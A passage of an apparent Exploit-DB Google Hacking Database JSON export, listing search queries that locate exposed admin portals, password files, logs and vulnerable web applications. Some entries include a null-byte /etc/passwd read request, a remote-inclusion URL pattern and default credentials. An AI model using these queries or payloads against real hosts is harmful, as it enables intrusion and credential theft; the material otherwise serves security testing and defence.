http://www.jmarshall.com/tools/cgiproxy/ ) is a CGI-based proxy application. It runs on a web server, and acts as an http proxy, in CGI form. A prudent site owner would hide it behind .htaccess, as most do, but with a powerful tool like google, the inprudent few who leave it open can quickly be seperated from the wise masses.CGI-proxy's default page contains the text, as you can see in the demo on their site:\"Start browsing through this CGI-based proxy by entering a URL below. Only HTTP and FTP URLs are supported. Not all functions will work (e.g. some JavaScript), but most pages will be fine.\"The proxy as it resides on a server is most often called nph-proxy.cgi. A web cracker can now use google to enumerate his list of proxy servers, like so:inurl:\"nph-proxy.cgi\" \"Start browsing through this CGI-based proxy\"More results can be obtained by admitting the \"inurl:nph-proxy.cgi\" constraint, but much more trash is generated as well." }, { "signatureReferenceNumber": "467", "link": "https://www.exploit-db.com/ghdb/467/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=intitle%3A%22Index+of+*%22+inurl%3A%22my+shared+folder%22+size+modified&btnG=Search", "shortDescription": "intitle:\"Index of *\" inurl:\"my shared folder\" size modified", "textualDescription": "These are index pages of \"My Shared Folder\". Sometimes they contain juicy stuff like mp3's or avi files. Who needs pay sites for music when you got Google ? :) Uhm, well except for the copyright issue." }, { "signatureReferenceNumber": "468", "link": "https://www.exploit-db.com/ghdb/468/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=inurl%3A%22%2Fbecommunity%2Fcommunity%2Findex.php%3Fpageurl%3D%22&sourceid=mozilla-search&start=0&start=0&ie=utf-8&oe=utf-8", "shortDescription": "E-market remote code execution", "textualDescription": "E-market is commercial software made by a korean company(http://www.bbs2000.co.kr). A vulnerability in this software was reported to Bugtraq. The exploit is possible with the index.php script:http://[TARGET]/becommunity/community/index.php?pageurl=[injection URL]http://[TARGET]/becommunity/community/index.php?from_market=Y&pageurl=[injection URL] For more information read this:http://echo.or.id/adv/adv06-y3dips-2004.txt Author: y3dipsDate: Sept, 7th 2004Location: Indonesian, Jakarta" }, { "signatureReferenceNumber": "469", "link": "https://www.exploit-db.com/ghdb/469/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=en&ie=UTF-8&q=filetype%3Apot+inurl%3Ajohn.pot+&btnG=Google+Search", "shortDescription": "filetype:pot inurl:john.pot", "textualDescription": "John the Ripper is a popular cracking program every hacker knows. It's results are stored in a file called john.pot.This search finds such results files, currently only one. Also No results for the distributed john version (djohn.pot) today :)PS: This was posted to the \"fun\" forum, so don't take this too seriously !" }, { "signatureReferenceNumber": "470", "link": "https://www.exploit-db.com/ghdb/470/", "category": "Vulnerable Files", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=intitle%3Agallery+inurl%3Asetup+%22Gallery+configuration%22&btnG=Search", "shortDescription": "Gallery configuration setup files", "textualDescription": "Gallery is a popular images package for websites. Unfortunately, with so many users, more bugs will be found and Google will find more installations. This search finds Gallery sites that seem to have left more or less dangerous files on their servers, like resetadmin.php and others.We call it Gallery in Setup mode :)" }, { "signatureReferenceNumber": "471", "link": "https://www.exploit-db.com/ghdb/471/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=filetype%3Axls+inurl%3A%22email.xls%22+&btnG=Search", "shortDescription": "filetype:xls inurl:\"email.xls\"", "textualDescription": "Our forum members never get tired of finding juicy MS office files. Here's one by urban that finds email addresses." }, { "signatureReferenceNumber": "472", "link": "https://www.exploit-db.com/ghdb/472/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=en&ie=UTF-8&q=filetype%3Apdb+pdb+backup+%28Pilot+%7C+Pluckerdb%29+&btnG=Google+Search", "shortDescription": "filetype:pdb pdb backup (Pilot | Pluckerdb)", "textualDescription": "Hotsync database files can be found using \"All databases on a Palm device, including the ones you create using NS Basic/Palm, have the same format. Databases you create using NS Basic/Palm have the backup bit set by default, so they are copied to your \"x:\\palm\\{username}\\backup\"The forum members suggested adding Pilot and Pluckerdb (linux software for pda), so the results are more clean. (pdb files can be used for protein databases, which we don't want to see).Currently we don't know of a program to \"read\" these binary files." }, { "signatureReferenceNumber": "473", "link": "https://www.exploit-db.com/ghdb/473/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?hl=de&ie=ISO-8859-1&q=filetype%3Apl+%22Download%3A+SuSE+Linux+Openexchange+Server+CA%22+%0D%0A+%0D%0A&btnG=Google-Suche&meta=", "shortDescription": "filetype:pl \"Download: SuSE Linux Openexchange Server CA\"", "textualDescription": "this search will get you on the web administration portal of linux open exchange servers." }, { "signatureReferenceNumber": "474", "link": "https://www.exploit-db.com/ghdb/474/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?hl=de&ie=ISO-8859-1&q=intitle%3A%22dreambox+web%22+&btnG=Google-Suche&meta=", "shortDescription": "intitle:\"dreambox web\"", "textualDescription": "this search will show web administration interfaces of linux dream boxes.The Dreambox is one of the popular 3rd generation boxes. Based on a powerful IBM PowerPC (not PC !) with an MPEG1/2 hardware decoder, this box is FULLY open, with an open source Linux operating system. The Dreambox not only offers high quality video and audio, but also has a variety of connections to the outside world: Ethernet, USB, PS2, Compact Flash and two Smartcard readers. The box can handle any dish configuration, an unlimited number of channels or satellites, has a very fast channel scan, allows for direct digital recording, etc." }, { "signatureReferenceNumber": "475", "link": "https://www.exploit-db.com/ghdb/475/", "category": "Vulnerable Files", "querystring": "http://www.google.com/search?q=%22create+the+Super+User%22+%22now+by+clicking+here%22", "shortDescription": "PHP-Nuke - create super user right now !", "textualDescription": "PHP-Nuke is a popular web portal thingie. It has popped up in the Google dorks before. I think we let this one describe itself, quoting from a vulnerable page:\"Welcome to PHP-Nuke!Congratulations! You have now a web portal installed!. You can edit or change this message from the Administration page. For security reasons the best idea is to create the Super User right NOW by clicking HERE.\"" }, { "signatureReferenceNumber": "476", "link": "https://www.exploit-db.com/ghdb/476/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?num=100&q=filetype%3Aasp+DBQ%3D%22+%26+Server.MapPath%28%22*.mdb%22%29", "shortDescription": "filetype:asp DBQ=\" * Server.MapPath(\"*.mdb\")", "textualDescription": "This search finds sites using Microsoft Access databases, by looking for the the database connection string. There are forums and tutorials in the results, but also the real databases. An attacker can use this to find the name and location of the database and download it for his viewing pleasure, which may lead to information leakage or worse." }, { "signatureReferenceNumber": "477", "link": "https://www.exploit-db.com/ghdb/477/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle%3A%22TUTOS+Login%22", "shortDescription": "intitle:\"TUTOS Login\"", "textualDescription": "TUTOS stands for \"The Ultimate Team Organization Software.\" This search finds the login portals to TUTOS.Adding scheme.php in the /php/ directory seems to allow cool things. There seems to be a foothold for SQL table structures and, upon errors, directory structure of the server. It is said that with the username linus and the password guest you can see what it looks like when your logged in. This is unconfirmed as of now." }, { "signatureReferenceNumber": "478", "link": "https://www.exploit-db.com/ghdb/478/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=%22Login+to+Usermin%22+inurl%3A20000", "shortDescription": "\"Login to Usermin\" inurl:20000", "textualDescription": "Usermin is a web interface that can be used by any user on a Unix system to easily perform tasks like reading mail, setting up SSH or configuring mail forwarding. It can be thought of as a simplified version of Webmin designed for use by normal users rather than system administrators." }, { "signatureReferenceNumber": "479", "link": "https://www.exploit-db.com/ghdb/479/", "category": "Vulnerable Files", "querystring": "http://www.google.com/search?num=100&q=filetype%3Alit+lit+%28books%7Cebooks%29", "shortDescription": "filetype:lit lit (books|ebooks)", "textualDescription": "Tired of websearching ? Want something to read ? You can find Ebooks (thousands of them) with this search..LIT files can be opened with Microsoft Reader (http://www.microsoft.com/reader/)" }, { "signatureReferenceNumber": "480", "link": "https://www.exploit-db.com/ghdb/480/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=%22Powered+*%3A+newtelligence%22+%28%22dasBlog+1.6%22%7C+%22dasBlog+1.5%22%7C+%22dasBlog+1.4%22%7C%22dasBlog+1.3%22%29&btnG=Search", "shortDescription": "\"Powered *: newtelligence\" (\"dasBlog 1.6\"| \"dasBlog 1.5\"| \"dasBlog 1.4\"|\"dasBlog 1.3\")", "textualDescription": "DasBlog is reportedly susceptible to an HTML injection vulnerability in its request log. This vulnerability is due to a failure of the application to properly sanitize user-supplied input data before using it in the generation of dynamic web pages. Versions 1.3 - 1.6 are reported to be vulnerable.More:http://www.securityfocus.com/bid/11086/discussion/" }, { "signatureReferenceNumber": "481", "link": "https://www.exploit-db.com/ghdb/481/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?num=100&q=inurl%3A%22%2Fnames.nsf%3FOpenDatabase%22+-inurl%3Agov", "shortDescription": "Lotus Domino address books", "textualDescription": "This search will return any Lotus Domino address books which may be open to the public. This can contain a lot of detailed personal info you don't want to fall in the hands of your competitors or hackers. Most of them are password protected." }, { "signatureReferenceNumber": "482", "link": "https://www.exploit-db.com/ghdb/482/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?hl=en&ie=UTF-8&q=intitle%3A%22Login+-+powered+by+Easy+File+Sharing+Web+Server%22+&btnG=Google+Search", "shortDescription": "intitle:\"Login - powered by Easy File Sharing Web Server\"", "textualDescription": "Easy File Sharing Web Server is a file sharing software that allows visitors to upload/download files easily through a Web Browser (IE,Netscape,Opera etc.)\". More information at: http://www.securityfocus.com/bid/11034/discussion/An attacker can reportedly bypass the authentication by entering the the name of the virtual folder directly." }, { "signatureReferenceNumber": "483", "link": "https://www.exploit-db.com/ghdb/483/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=intitle%3A%22Tomcat+Server+Administration%22", "shortDescription": "intitle:\"Tomcat Server Administration\"", "textualDescription": "This finds login portals for Apache Tomcat, an open source Java servlet container which can run as a standalone server or with an Apache web server." }, { "signatureReferenceNumber": "484", "link": "https://www.exploit-db.com/ghdb/484/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=Admin+intitle%3A%22eZ+publish+administration%22", "shortDescription": "ez Publish administration", "textualDescription": "Thousands of enterprises, governmental offices, non-profit organizations, small and middle sized companies and educational institutions around the world trust eZ publish for running their web solutions.Vendor site: http://www.ez.no/Vulnerabilities: http://search.securityfocus.com/swsearch?query=ez+publish&sbm=bid&submit=Search%21&metaname=alldoc&sort=swishlastmodifiedDepending on the version two queries can usedAdmin intitle:\"eZ publish administration\"intitle:\"Login\" \"Welcome to eZ publish administration\"Crosssite Scriting, Information Disclosure, Pathdisclosure available on older versions" }, { "signatureReferenceNumber": "485", "link": "https://www.exploit-db.com/ghdb/485/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=inurl%3Aadministrator+%22welcome+to+mambo%22", "shortDescription": "inurl:administrator \"welcome to mambo\"", "textualDescription": "Mambo is a full-featured content management system that can be used for everything from simple websites to complex corporate applications. Continue reading for a detailed feature list.Vendor: http://www.mamboserver.com/Cross Site Scripting and SQL injection exist in some versions 4.5 current version is 4.5.1RC3 Vulnerabilities: http://search.securityfocus.com/swsearch?query=mambo+open+source&sbm=bid&submit=Search%21&metaname=alldoc" }, { "signatureReferenceNumber": "486", "link": "https://www.exploit-db.com/ghdb/486/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22Powered+by+DCP-Portal+v5.5%22", "shortDescription": "\"Powered by DCP-Portal v5.5\"", "textualDescription": "DCP-Portal is more a community system than a CMS - it nevertheless calls itsself CMS. They have never seen a real CMS. Version 5.5 is vulnerable sql injection.Vulnerabilities: http://search.securityfocus.com/swsearch?query=dcp-portal&sbm=bid&submit=Search%21&metaname=alldoc" }, { "signatureReferenceNumber": "487", "link": "https://www.exploit-db.com/ghdb/487/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=inurl%3A%22typo3%2Findex.php%3Fu%3D%22+-demo", "shortDescription": "inurl:\"typo3/index.php?u=\" -demo", "textualDescription": "TYPO3 is a free Open Source content management system for enterprise purposes on the web and in intranets, featuring a set of ready-made interfaces, functions and modules.Vendor: http://www.typo3.com/Vulns: http://search.securityfocus.com/swsearch?query=Typo3&sbm=bid&submit=Search%21&metaname=alldoc" }, { "signatureReferenceNumber": "488", "link": "https://www.exploit-db.com/ghdb/488/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?q=intitle%3Aindex.of+%28inurl%3Afileadmin+%7C+intitle%3Afileadmin%29", "shortDescription": "intitle:index.of (inurl:fileadmin | intitle:fileadmin)", "textualDescription": "TYPO3 is a free Open Source content management system for enterprise purposes on the web and in intranets, featuring a set of ready-made interfaces, functions and modules.The fileadmin directory is the storage for all user data like website templates, graphics, documents and so on. Normally no sensitive data will be stored here except the one made available in restricted areas.Unprotected fileadmin directories can be found by an attacker using this query.Vendor: http://www.typo3.com/" }, { "signatureReferenceNumber": "489", "link": "https://www.exploit-db.com/ghdb/489/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=%22FC+Bigfeet%22+-inurl%3Amail", "shortDescription": "Quicksite demopages for Typo3", "textualDescription": "TYPO3 is a free Open Source content management system for enterprise purposes on the web and in intranets, featuring a set of ready-made interfaces, functions and modules.The quicksite package is a demosite for typo3. Quicksite or Testsite will install a complete website of a soccerclub using the following credentials:user:adminpassword:passwordIf you want to login, again append \"typo3\" to the website dir.Vendor: http://www.typo3.com/An attacker will consider this as yet another way to find Typo3 hosts for which security focus lists vulnerabilities." }, { "signatureReferenceNumber": "490", "link": "https://www.exploit-db.com/ghdb/490/", "category": "Network or vulnerability data", "querystring": "http://www.google.com/search?q=site%3Anetcraft.com+intitle%3AThat.Site.Running+Apache", "shortDescription": "site:netcraft.com intitle:That.Site.Running Apache", "textualDescription": "Netcraft reports a site's operating system, web server, and netblock owner together with, if available, a graphical view of the time since last reboot for each of the computers serving the site. So, Netcraft scans Web servers, Google scans Netcraft, and the hacker scans Google.This search is easily modified (replace \"apache\" for the other server software), thus adding yet another way to find the webserver software version info." }, { "signatureReferenceNumber": "491", "link": "https://www.exploit-db.com/ghdb/491/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=ext:log+%22Software:+Microsoft+Internet+Information+Services+*.*%22", "shortDescription": "ext:log \"Software: Microsoft Internet Information Services *.*\"", "textualDescription": "Microsoft Internet Information Services (IIS) has log files that are normally not in the docroot, but then again, some people manage to share them. An attacker may use these to gather: loginnames (FTP service), pathinformation, databasenames, and stuff..Examples:12:09:37 194.236.57.10 [2501]USER micze 33112:09:38 194.236.57.10 [2501]PASS - 23008:30:38 194.236.57.10 [2416]DELE com-gb97.mdb2000-06-18 15:08:30 200.16.212.225 activeip\\carpinchos 4.22.121.13 80 POST /_vti_bin/_vti_aut/author.dll - 200 2958 551 120 MSFrontPage/4.0 -" }, { "signatureReferenceNumber": "492", "link": "https://www.exploit-db.com/ghdb/492/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=filetype%3Acgi+inurl%3Atseekdir.cgi", "shortDescription": "filetype:cgi inurl:tseekdir.cgi", "textualDescription": "The Turbo Seek search engine has a vulnerability. The removed user can look at the contents of files on target. A removed user can request an URL with name of a file, which follows NULL byte (%00) to force system to display the contents of a required file, for example:/cgi-bin/cgi/tseekdir.cgi?location=/etc/passwd%00/cgi-bin/tseekdir.cgi?id=799*location=/etc/passwd%00 More: http://www.securitytracker.com/alerts/2004/Sep/1011221.html" }, { "signatureReferenceNumber": "493", "link": "https://www.exploit-db.com/ghdb/493/", "category": "Network or vulnerability data", "querystring": "http://www.google.com/search?hl=en&ie=UTF-8&q=%22Powered+by+phpOpenTracker%22+Statistics+&btnG=Google+Search", "shortDescription": "\"Powered by phpOpenTracker\" Statistics", "textualDescription": "phpOpenTracker is a framework solution for the analysis of website traffic and visitor analysis. More info at the vendor site: http://www.phpopentracker.de/en/index.phpA prebuild sample report is shipped with PhpOpenTracker which is used by most sites. This report does not use all possibilities of the framework like user tracking." }, { "signatureReferenceNumber": "494", "link": "https://www.exploit-db.com/ghdb/494/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?num=100&q=filetype%3Avcs+vcs", "shortDescription": "filetype:vcs vcs", "textualDescription": "Filext.com says: \"Various programs use the *.VCS extension; too many to list individually. Take clues from the location of the file as a possible pointer to exactly which program is producing the file. The file's date and time can also help if you know which programs you were running when the file was written.\"The most common use is the \"vCalendar File\", used by Outlook for example. It can also belong to a \"Palm vCal Desktop Application\". For those who prefer clean searches, try these variations (with less results):\"PRODID: PalmDesktop Generated\"filetype:vcs VCALENDAR filetype:vcs BEGIN:VCALENDAR" }, { "signatureReferenceNumber": "495", "link": "https://www.exploit-db.com/ghdb/495/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=filetype%3Aconfig+config+intext%3AappSettings+%22User+ID%22", "shortDescription": "filetype:config config intext:appSettings \"User ID\"", "textualDescription": "These files generally contain configuration information for a .Net Web Application. Things like connection strings to databases file directories and more. On a properly setup IIS these files are normally not served to the public." }, { "signatureReferenceNumber": "496", "link": "https://www.exploit-db.com/ghdb/496/", "category": "Network or vulnerability data", "querystring": "http://www.google.com/search?q=inurl%3A%22%2Fcatalog%2Ensf%22+intitle%3Acatalog", "shortDescription": "inurl:\"/catalog.nsf\" intitle:catalog", "textualDescription": "This will return servers which are running versions of Lotus Domino. The catalog.nsf is the servers DB catalog. It will list all the DB's on the server and sometimes some juicy info too. An attacker can back the url down to the \"/catalog.nsf\" part if needed." }, { "signatureReferenceNumber": "497", "link": "https://www.exploit-db.com/ghdb/497/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=filetype%3Apst+inurl%3A%22outlook.pst%22", "shortDescription": "filetype:pst inurl:\"outlook.pst\"", "textualDescription": "All versions of the popular business groupware client called Outlook have the possibility to store email, calenders and more in a file for backup or migration purposes.An attacker may learn a great deal about the owner or the company by downloading these files and importing them in his own client for his viewing pleasure." }, { "signatureReferenceNumber": "498", "link": "https://www.exploit-db.com/ghdb/498/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?num=100&hl=en&q=%22index+of%2F%22+%22ws_ftp.ini%22+%22parent+directory%22", "shortDescription": "\"index of/\" \"ws_ftp.ini\" \"parent directory\"", "textualDescription": "This search is a cleanup of a previous entry by J0hnny. It uses \"parent directory\" to avoid results other than directory listings.WS_FTP.ini is a configuration file for a popular win32 FTP client that stores usernames and weakly encoded passwords. There is another way to find this file, that was added by Xewan:filetype:ini ws_ftp pwdIn our experience it's good to try both methods, as the results will differ quite a bit." }, { "signatureReferenceNumber": "499", "link": "https://www.exploit-db.com/ghdb/499/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&ie=UTF-8&q=filetype%3Aphp+inurl%3Aindex.php+inurl%3A%22module%3Dsubjects%22+inurl%3A%22func%3D*%22+%28listpages%7C+viewpage+%7C+listcat%29&btnG=Google+Search", "shortDescription": "filetype:php inurl:index.php inurl:\"module=subjects\" inurl:\"func=*\" (listpages| viewpage | listcat)", "textualDescription": "Reportedly the PostNuke Modules Factory Subjects module is affected by a remote SQL injection vulnerability. http://securityfocus.com/bid/11148/discussion/" }, { "signatureReferenceNumber": "500", "link": "https://www.exploit-db.com/ghdb/500/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=uploadpics.php%3Fdid%3D+-forum", "shortDescription": "W-Nailer Upload Area", "textualDescription": "What is W-Nailer?W-Nailer is a PHP script which can create galleries for you.It uses a graphical library (GD) which enables PHP to manipulate images, for instance resizing to create thumbnails.W-Nailer is highly configurable to meet your needs. Even better, the configuration is nearly completely webbased.So after you have uploaded your files, you will just need your browser!" }, { "signatureReferenceNumber": "501", "link": "https://www.exploit-db.com/ghdb/501/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=filetype%3Acgi+inurl%3Apdesk.cgi&btnG=Search", "shortDescription": "filetype:cgi inurl:pdesk.cgi", "textualDescription": "PerlDesk is a web based help desk and email management application designed to streamline support requests, with built in tracking and response logging.http://www.securitytracker.com/alerts/2004/Sep/1011276.html" }, { "signatureReferenceNumber": "502", "link": "https://www.exploit-db.com/ghdb/502/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=en&ie=UTF-8&q=ext%3Aldif+ldif&btnG=Google+Search", "shortDescription": "ext:ldif ldif", "textualDescription": "www.filext.com says LDIF = LDAP Data Interchange Format.LDAP is used for nearly everything in our days, so this file may include some juice info for attackers. They can add INTEXT:keyword to get more specific targets." }, { "signatureReferenceNumber": "503", "link": "https://www.exploit-db.com/ghdb/503/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=inurl:mewebmail&hl=en&lr=&ie=UTF-8&filter=0", "shortDescription": "inurl:mewebmail", "textualDescription": "MailEnable Standard Edition provides robust SMTP and POP3 services for Windows NT/2000/XP/2003 systems. This version is free for both personal and commercial usage and does not have any time, user or mailbox restrictions.This search is a portal search. If finds the logins screens. If a vulnerability is found, this search becomes the target base for an attacker." }, { "signatureReferenceNumber": "504", "link": "https://www.exploit-db.com/ghdb/504/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=%22Powered+by+IceWarp+Software%22+inurl%3Amail", "shortDescription": "\"Powered by IceWarp Software\" inurl:mail", "textualDescription": "IceWarp Web Mail is reported prone to multiple input validation vulnerabilities. Few details regarding the specific vulnerabilities are known. These vulnerabilities are reported to affect all versions of IceWarp Web Mail prior to version 5.2.8.There are two ways to find installations of IceWarp:\"Powered by IceWarp Software\" inurl:mailintitle:\"IceWarp Web Mail\" inurl:\":32000/mail/\"http://www.securityfocus.com/bid/10920" }, { "signatureReferenceNumber": "505", "link": "https://www.exploit-db.com/ghdb/505/", "category": "Files containing juicy info", "querystring": "http://www.google.co.uk/search?q=inurl:/_layouts/settings&hl=en&lr=&ie=UTF-8&safe=off&start=10&sa=N", "shortDescription": "inurl:/_layouts/settings", "textualDescription": "With the combined collaboration features of Windows SharePoint Services and SharePoint Portal Server 2003, users in an organization can create, manage, and build collaborative Web sites and make them available throughout the organization. More information is available at : http://www.microsoft.com/sharepoint/Loads of company info can be gained by an attacker when the URL's are unprotected. Furthermore unprotected sharepoint sites give full \"Edit, Add and Delete access\" to the information, which in case of malicious users may cause loss of important data." }, { "signatureReferenceNumber": "506", "link": "https://www.exploit-db.com/ghdb/506/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=intitle%3A%22MRTG%2FRRD%22+1.1*+%28inurl%3Amrtg.cgi+%7C+inurl%3A14all.cgi+%7Ctraffic.cgi%29+&btnG=Search", "shortDescription": "intitle:\"MRTG/RRD\" 1.1* (inurl:mrtg.cgi | inurl:14all.cgi |traffic.cgi)", "textualDescription": "The remote user can reportedly view the first string of any file on the system where script installed. This is a very old bug, but some sites never upgraded their MRTG installations.http://www.securitytracker.com/alerts/2002/Feb/1003426.htmlAn attacker will find it difficult to exploit this in any usefull way, but it does expose one line of text from a file, for example (using the file /etc/passwd) shows this:ERROR: CFG Error Unknown Option \"root:x:0:1:super-user:/\" on line 2 or above." }, { "signatureReferenceNumber": "507", "link": "https://www.exploit-db.com/ghdb/507/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=filetype%3Amdb+wwforum", "shortDescription": "filetype:mdb wwforum", "textualDescription": "Web Wiz Forums is a free ASP Bulletin Board software package. It uses a Microsoft Access database for storage. The installation instructions clearly indicate to change the default path and filename (admin/database/wwForum.mdb).vendor: http://www.webwizguide.info/web_wiz_forums/The forum database contains the members passwords, either encrypted or in plain text, depending on the version.Please note: this search is proof that results can stay in Google's index for a long time, even when they are not on the site any longer. Currently only 2 out of 9 are actually still downloadable by an attacker." }, { "signatureReferenceNumber": "508", "link": "https://www.exploit-db.com/ghdb/508/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?q=%22Powered+By+Elite+Forum+Version+*.*%22", "shortDescription": "\"Powered By Elite Forum Version *.*\"", "textualDescription": "Elite forums is one of those Microsoft Access .mdb file based forums. This one is particularly dangerous, because the filename and path are hardcoded in the software. An attacker can modify index.php for ./data/users/userdb.dat, open the file and see something like this:42administrat4571XXX367b52XXXb33b6ce74df1e0170(data was xx'd)These are MD5 digests and can be brute forced (with enough time) or dictionary cracked by a malicious user, thus giving adminstrator access to the forum." }, { "signatureReferenceNumber": "509", "link": "https://www.exploit-db.com/ghdb/509/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&newwindow=1&q=intitle%3A%22microsoft+certificate+services%22+inurl%3Acertsrv&btnG=Search", "shortDescription": "intitle:\"microsoft certificate services\" inurl:certsrv", "textualDescription": "Microsoft Certificate Services Authority (CA) software can be used to issue digital certificates. These are often used as \"proof\" that someone or something is what they claim they are. The Microsoft certificates are meant to be used with IIS for example with Outlook Web Access. The users of these certificates have to decide if they trust it or not. If they do, they can import a root certificate into their browsers (IE).Anyways, this search by JimmyNeutron uncovers a few of these certificate servers directly connected to the Internet. Which (in theory) means anyone could issue a certificate from these sites and abuse it to mislead websurfers in phishing scams and such." }, { "signatureReferenceNumber": "510", "link": "https://www.exploit-db.com/ghdb/510/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=intitle%3A%22webadmin+-+%2F*%22+f", "shortDescription": "intitle:\"webadmin - /*\" filetype:php directory filename permission", "textualDescription": "Webadmin.php is a free simple Web-based file manager. This search finds sites that use this software. If left unprotected an attacker files can be modified or added on the server.More info and screenshot at: http://cker.name/webadmin/" }, { "signatureReferenceNumber": "511", "link": "https://www.exploit-db.com/ghdb/511/", "category": "Web Server Detection", "querystring": "http://www.google.com/search?num=100&&q=intitle%3AAnswerBook2+inurl%3Aab2%2F+%28inurl%3A8888+%7C+inurl%3A8889%29", "shortDescription": "intitle:AnswerBook2 inurl:ab2/ (inurl:8888 | inurl:8889)", "textualDescription": "First of all this search indicates solaris machines and second the webservice is vulnerable to a format string attack.Sun's AnswerBook 2 utilizes a third-party web server daemon (dwhttpd) that suffers from a format string vulnerability. The vulnerability can be exploited to cause the web server process to execute arbitrary code. The web server runs as user and group 'daemon' who, under recent installations of Solaris, owns no critical fileshttp://www.securiteam.com/unixfocus/5SP081F80K.htm" }, { "signatureReferenceNumber": "512", "link": "https://www.exploit-db.com/ghdb/512/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle%3A%22Live+View+%2F+-+AXIS%22+%7C+inurl%3Aview%2Fview.shtml%5E", "shortDescription": "More Axis netcams !", "textualDescription": "More Axis Netcams, this search combines the cams with the default title (Live View) and extends it by searching for the \"view/view.shtml\" URL identifier. Models found with this search are:AXIS 205 version 4.02AXIS 206M Network Camera version 4.10AXIS 206W Network Camera version 4.10AXIS 211 Network Camera version 4.02AXIS 241S Video Server version 4.02AXIS 241Q Video Server version 4.01Axis 2100 Network CameraAxis 2110 Network Camera 2.34Axis 2120 Network Camera 2.40AXIS 2130R PTZ Network Camera" }, { "signatureReferenceNumber": "513", "link": "https://www.exploit-db.com/ghdb/513/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle:%22The+AXIS+200+Home+Page%22", "shortDescription": "intitle:\"The AXIS 200 Home Page\"", "textualDescription": "The Axis 200 HOME pages reside within the AXIS 200 device and hold information about the current software version, technical documentation, some howto's and the device settings." }, { "signatureReferenceNumber": "514", "link": "https://www.exploit-db.com/ghdb/514/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=%28%22Fiery+WebTools%22+inurl%3Aindex2.html%29+%7C+%22WebTools+enable+*+*+observe%2C+*%2C+*+*+*+flow+*+print+jobs%22&btnG=Search", "shortDescription": "(\"Fiery WebTools\" inurl:index2.html) | \"WebTools enable * * observe, *, * * * flow * print jobs\"", "textualDescription": "Fiery WebTools offers many of the same capabilities of the Command WorkStation\u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u201a\u00ac\u00c5\u00be\u00c3\u201a\u00c2\u00a2, via a Java-enabled Web browser. All job control options such as job merging, edition and previews, as well as information on the status of the jobs are accessible through Fiery WebTools." }, { "signatureReferenceNumber": "515", "link": "https://www.exploit-db.com/ghdb/515/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle%3A%22network+administration%22+inurl%3A%22nic%22", "shortDescription": "Konica Network Printer Administration", "textualDescription": "This finds Konica Network Printer Administration pages. There is one result at the time of writing." }, { "signatureReferenceNumber": "516", "link": "https://www.exploit-db.com/ghdb/516/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&q=inurl%3Asts_index.cgi", "shortDescription": "Aficio 1022", "textualDescription": "The Ricoh Aficio 1022 is a digital multifunctional B&W copier, easily upgraded to include network printing, network scanning, standard/LAN faxing and storage capabilities." }, { "signatureReferenceNumber": "517", "link": "https://www.exploit-db.com/ghdb/517/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=intitle%3ARICOH+intitle%3A%22Network+Administration%22", "shortDescription": "intitle:RICOH intitle:\"Network Administration\"", "textualDescription": "Network Administration pages for several Ricoh Afficio printer models, for example the Aficio 1018D and RICOH LASER AP1600." }, { "signatureReferenceNumber": "518", "link": "https://www.exploit-db.com/ghdb/518/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle:%22lantronix+web-manager%22&hl=en&lr=&ie=UTF-8&filter=0", "shortDescription": "intitle:\"lantronix web-manager\"", "textualDescription": "The Lantronix web manager home pages show the print server configuration (Server Name, Boot 